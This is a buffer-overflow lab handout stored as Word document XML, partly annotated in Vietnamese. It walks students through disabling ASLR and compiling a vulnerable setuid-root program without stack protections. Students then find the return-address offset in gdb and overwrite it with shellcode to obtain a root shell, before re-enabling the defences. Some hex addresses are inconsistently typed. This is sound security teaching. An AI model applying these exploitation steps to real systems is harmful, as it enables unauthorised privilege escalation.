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DFF" w:rsidRPr="00620487" w:rsidRDefault="00C648AF" w:rsidP="00F03A06">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00620487">
        <w:rPr>
          <w:b/>
          <w:sz w:val="42"/>
        </w:rPr>
        <w:t>Lab1.   Buffer Overflows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C648AF" w:rsidRDefault="00C648AF"/>
    <w:p w:rsidR="00C648AF" w:rsidRDefault="00C648AF" w:rsidP="00C648AF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>A generic buffer overflow occurs when a buffer that has been allocated a specific storage space has more data copied to it than it can handle</w:t>
      </w:r>
      <w:r w:rsidR="00F03A06">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C648AF" w:rsidRPr="00F03A06" w:rsidRDefault="00F03A06" w:rsidP="00F03A06">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F03A06">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Buffer overflow steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F03A06" w:rsidRDefault="00F03A06" w:rsidP="00F03A06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Find the presense and location of buffer overflow vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F03A06" w:rsidRDefault="00F03A06" w:rsidP="00F03A06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Write mote data into the buffer than it can handle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F03A06" w:rsidRDefault="00F03A06" w:rsidP="00F03A06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Overwites the return address of a function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F03A06" w:rsidRDefault="00F03A06" w:rsidP="00F03A06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Changes the execution flow to the hacker code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA68C7" w:rsidRPr="00EA68C7" w:rsidRDefault="00EA68C7" w:rsidP="00774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A68C7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Submission: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB450D" w:rsidRDefault="00EA68C7" w:rsidP="00774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8C7">
        <w:t>You will compose a lab report that documents each step you take, including screenshots to illustrate the effects of commands you type, and describing your observations</w:t>
      </w:r>
      <w:r w:rsidR="00FB450D">
        <w:t>. Simply attaching code without any explanation will not receive credits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0016009C" w:rsidRDefault="0016009C" w:rsidP="00EA68C7">
      <w:r w:rsidRPr="0016009C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Time duration:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006954C6">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="0038143D">
        <w:t xml:space="preserve"> week</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0087520A" w:rsidRDefault="0087520A" w:rsidP="00EA68C7">
      <w:r>
        <w:t>Lab guide:</w:t>
      </w:r>
      <w:r w:rsidR="00B84AAC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0087520A" w:rsidRPr="00367A4E" w:rsidRDefault="00F61BCF" w:rsidP="00EA68C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Step 0. Prepara</w:t>
      </w:r>
      <w:r w:rsidR="0087520A" w:rsidRPr="00367A4E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0087520A" w:rsidRPr="0087520A" w:rsidRDefault="0087520A" w:rsidP="0087520A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F61BCF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ubuntu 16.04 (32-bit)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0087520A" w:rsidRPr="0087520A" w:rsidRDefault="0087520A" w:rsidP="0087520A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Source code: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F61BCF">
        <w:rPr>
          <w:b/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>stack.c, exploit.c</w:t>
      </w:r>
      <w:r w:rsidR="00F61BCF" w:rsidRPr="00F61BCF">
        <w:rPr>
          <w:b/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>/exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00752416" w:rsidRPr="00367A4E" w:rsidRDefault="0087520A" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1. </w:t>
      </w:r>
      <w:r w:rsidR="0032075D" w:rsidRPr="00367A4E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Disable address randomization</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032075D" w:rsidRPr="00B75A94" w:rsidRDefault="0032075D" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B75A94">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>$sudo sysctl –w  kernel.randomize_va_space=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032075D" w:rsidRPr="00367A4E" w:rsidRDefault="0032075D" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Step 2. Finding the address of the inject code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032075D" w:rsidRPr="00367A4E" w:rsidRDefault="0032075D" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>$gcc –z execstack –fno-stack-protector –g –o stack_dbg stack.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032075D" w:rsidRPr="00367A4E" w:rsidRDefault="0032075D" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>$touch badfile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032075D" w:rsidRPr="00367A4E" w:rsidRDefault="0032075D" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>$gdb stack_dbg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032075D" w:rsidRDefault="0032075D" w:rsidP="0087520A">
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>(gdb)b bof</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> see the name of the function in stack.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032075D" w:rsidRDefault="0032075D" w:rsidP="0087520A">
      <w:r>
        <w:tab/>
        <w:t>(gdb)run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032075D" w:rsidRPr="00B75A94" w:rsidRDefault="0032075D" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>(gdb)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B75A94">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>p $ebp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032075D" w:rsidRDefault="0032075D" w:rsidP="0087520A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">$1 = (void *)  </w:t>
      </w:r>
      <w:r w:rsidR="00404929">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0xbfffeb38</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> xác định địa chỉ ebp</w:t>
      </w:r>
      <w:r w:rsidR="006246D0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006246D0" w:rsidRPr="006246D0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(giá trị có thể khác trên máy SV)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032075D" w:rsidRDefault="0032075D" w:rsidP="0087520A">
      <w:r>
        <w:tab/>
        <w:t>(gdb)p &amp;buffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032075D" w:rsidRDefault="0032075D" w:rsidP="0087520A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">$2 = (char (*) [100]) </w:t>
      </w:r>
      <w:r w:rsidRPr="00B75A94">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>0xbfff</w:t>
      </w:r>
      <w:r w:rsidR="00404929">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>eb18</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> xác định địa chỉ của buffer</w:t>
      </w:r>
      <w:r w:rsidR="006246D0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006246D0" w:rsidRPr="006246D0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(giá trị có thể khác trên máy SV)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032075D" w:rsidRDefault="0032075D" w:rsidP="0087520A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">(gdb) p/d </w:t>
      </w:r>
      <w:r w:rsidR="00404929">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0xbffffeb38</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00404929">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>0xbffffeb18</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tính khoảng cách từ ebp – buffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032075D" w:rsidRDefault="00404929" w:rsidP="0087520A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">$3 = </w:t>
      </w:r>
      <w:r w:rsidRPr="006246D0">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidR="0032075D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0032075D">
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r w:rsidR="0032075D">
        <w:t xml:space="preserve"> kết quả khoảng cách</w:t>
      </w:r>
      <w:r w:rsidR="006246D0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006246D0" w:rsidRPr="006246D0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(giá trị có thể khác trên máy SV)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367A4E" w:rsidRDefault="00404929" w:rsidP="00367A4E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Return address = ebp + (32</w:t>
      </w:r>
      <w:r w:rsidR="00367A4E">
        <w:t xml:space="preserve"> + 4) = ebp + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032075D" w:rsidRPr="00367A4E" w:rsidRDefault="00367A4E" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Step 3. Edit exploit.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367A4E" w:rsidRDefault="00367A4E" w:rsidP="0087520A">
      <w:r>
        <w:t>/* Fill the return address fiel with a candidate entry point of the malicious code */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367A4E" w:rsidRPr="00367A4E" w:rsidRDefault="00367A4E" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">*((long *) (buffer + </w:t>
      </w:r>
      <w:r w:rsidR="00404929">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">)) = </w:t>
      </w:r>
      <w:r w:rsidR="008A31EE">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0xbfffeb4</w:t>
      </w:r>
      <w:r w:rsidR="00404929">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="006246D0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>0x80</w:t>
      </w:r>
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367A4E" w:rsidRDefault="00367A4E" w:rsidP="0087520A">
      <w:r>
        <w:t>/* Place the shellcode towards the end of the buffer */</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367A4E" w:rsidRPr="00367A4E" w:rsidRDefault="00367A4E" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Memcpy(buffer + sizeof(buffer) – sizeof(shellcode), shellcode, sizeof(shellcode));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367A4E" w:rsidRPr="00367A4E" w:rsidRDefault="00367A4E" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Step 4. Execute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367A4E" w:rsidRPr="00367A4E" w:rsidRDefault="00367A4E" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$ sudo ln -sf /bin/zsh /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367A4E" w:rsidRPr="00367A4E" w:rsidRDefault="008E6B0E" w:rsidP="0087520A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$ gcc -DBUF_SIZE=</w:t>
      </w:r>
      <w:r w:rsidRPr="008E6B0E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="008E6B0E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r w:rsidR="00367A4E" w:rsidRPr="00367A4E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o stack -z execstack -fno-stack-protector stack.c </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367A4E" w:rsidRP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 xml:space="preserve">$ sudo chown root stack </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367A4E" w:rsidRP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>$ sudo chmod 4755 stack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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 xml:space="preserve">$ gcc -o exploit exploit.c </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367A4E" w:rsidRP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 xml:space="preserve">$./exploit // create the badfile </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367A4E" w:rsidRP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 xml:space="preserve">$./stack // launch the attack by running the vulnerable program </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367A4E" w:rsidRP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># &lt;---- You’ve got a root shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00367A4E" w:rsidRDefault="00367A4E" w:rsidP="0087520A"/>
    <w:p w:rsidR="0032075D" w:rsidRPr="00743925" w:rsidRDefault="00743925" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00743925">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Step 5. Defeating Address Randomization (ASLR)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00743925" w:rsidRDefault="00743925" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B75A94">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>$sudo sysctl</w:t>
      </w:r>
      <w:r w:rsidR="00B84AAC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> –w  kernel.randomize_va_space=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00743925" w:rsidRPr="00743925" w:rsidRDefault="00743925" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00743925">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6. </w:t>
      </w:r>
      <w:r w:rsidRPr="00743925">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Turn on the StackGuard Protection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00743925" w:rsidRDefault="00743925" w:rsidP="0087520A">
      <w:r>
        <w:t>you should compile the program without the -fno-stack-protector option</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00743925" w:rsidRPr="00743925" w:rsidRDefault="00743925" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00743925">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Step 7. Turn on the Non-executable Stack Protection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00743925" w:rsidRDefault="00743925" w:rsidP="0087520A">
      <w:r>
        <w:t>we recompile our vulnerable program using the noexecstack option</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00743925" w:rsidRDefault="00743925" w:rsidP="0087520A">
      <w:r>
        <w:t>$ gcc -o stack -fno-stack-protector -z noexecstack stack.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00743925" w:rsidRDefault="00743925" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00743925" w:rsidRDefault="00743925" w:rsidP="0087520A"/>
    <w:p w:rsidR="0087520A" w:rsidRDefault="0087520A" w:rsidP="0087520A">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B30BD7">
        <w:t xml:space="preserve">=== </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B30BD7" w:rsidRDefault="00B30BD7" w:rsidP="0087520A">
      <w:r>
        <w:t>Lab with exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B30BD7" w:rsidRPr="00497E80" w:rsidRDefault="00540371" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ret = </w:t>
      </w:r>
      <w:r w:rsidR="00ED64D1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0xbfffeb38</w:t>
      </w:r>
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00367A4E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00497E80">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>0x80</w:t>
      </w:r>
      <w:r w:rsidR="00497E80">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">  ///khac 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00540371" w:rsidRPr="0087520A" w:rsidRDefault="00540371" w:rsidP="0087520A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">offset = </w:t>
      </w:r>
      <w:r w:rsidR="00ED64D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00540371" w:rsidRPr="0087520A" w:rsidSect="0062048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2C03"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="757EE5F0"/>
    <w:lvl w:ilvl="0" w:tplc="A94081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E0590"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD04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762CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC38EE30"/>
    <w:lvl w:ilvl="0" w:tplc="EF80B1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344FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0927896"/>
    <w:lvl w:ilvl="0" w:tplc="FBB616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93"/>
    <w:rsid w:val="00050FAF"/>
    <w:rsid w:val="0016009C"/>
    <w:rsid w:val="0032075D"/>
    <w:rsid w:val="00350D97"/>
